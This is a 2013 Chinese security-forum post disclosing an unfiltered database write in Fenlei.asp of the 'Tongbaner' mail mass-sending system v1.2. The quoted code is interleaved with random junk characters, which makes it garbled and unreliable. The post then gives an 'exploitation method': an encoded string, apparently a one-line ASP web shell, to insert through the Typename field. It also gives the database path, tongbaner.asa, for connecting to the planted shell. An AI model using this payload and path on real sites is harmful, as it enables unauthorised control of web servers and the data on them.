找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2154|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
/ v* {: B( b& I0 F: q' ^7 x: P4 N+ |5 [# J( H$ r
IF Request.QueryString("Action")="del" Then
2 T+ a7 A9 l  U  G/ r: F1 nID=Request.QueryString("ID")
! @. |4 F- n. H- R- N+ ]IF Countss ("tui","Fenlei",ID )<>0 then 5 B2 x4 s; i7 B  \0 T
'略
' v/ _! A3 r6 @) U  J2 a7 d# EIF Request.QueryString("Action")="Add" Then 8 c0 K. P' u& a5 E+ A7 o9 d" Q
Tname=Request.Form("Typename")
5 u0 I! y1 P) _2 n- d- Q7 bSet Rs=Server.CreateObject("adodb.Recordset") - a9 `- n9 e! V7 [- j6 ~) `
Sql="Select * From Fenlei Order by id Desc " 0 ^5 H$ V+ h8 `0 J# v% k3 Z
Rs.Open Sql,Conn,1,3 , O1 E! c/ c) |4 c" d2 m
Rs.Addnew
1 t  `, `$ @) E# Q$ K2 {Rs("Typename")=Tname   S+ R# a9 c/ v( L/ Y, Q  f
'略
) e1 y/ S& O( r5 i9 u+ S! o1 p4 xSet Rs=Server.CreateObject("adodb.Recordset")
: _" h' w6 f- R( ~5 ]: m/ VSql="Select * From Fenlei Order by id Desc " ' m7 e0 {+ D* e9 H9 X
Rs.Open Sql,Conn,1,1
- k4 e$ c8 C# S  t: F'略
9 S1 l% L) z; O, J7 R%>: W" m. a7 N; K( E
7 ]" r0 q! [* Y8 G$ ~

: u9 m4 k: T0 V! b. ~
  g2 Y# j6 U$ ^1 u, U. x没有过滤,直接写入数据库。- Z2 h5 a( v, @

* Q9 i1 A( a6 ~: r利用方法:0 V9 V3 g  A5 g

! V( R8 w1 F) J0 E/ ]6 E  d0 U: g插入:┼攠數畣整爠煥敵瑳∨≡┩>4 v6 j7 s6 q2 y1 x
' u" ?) e# b- G7 M! K& c' j
; L: U7 D0 l! @3 U, W! d. e! h) y! P
连接: http://www.xxx.com/###tongbaner.asa
1 `, R' X  a; \  d% u+ q) F+ L'默认安装文件:
4 c4 X$ z& N# r0 y'install.asp
2 c* V5 ^) u8 u, ~+ a1 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表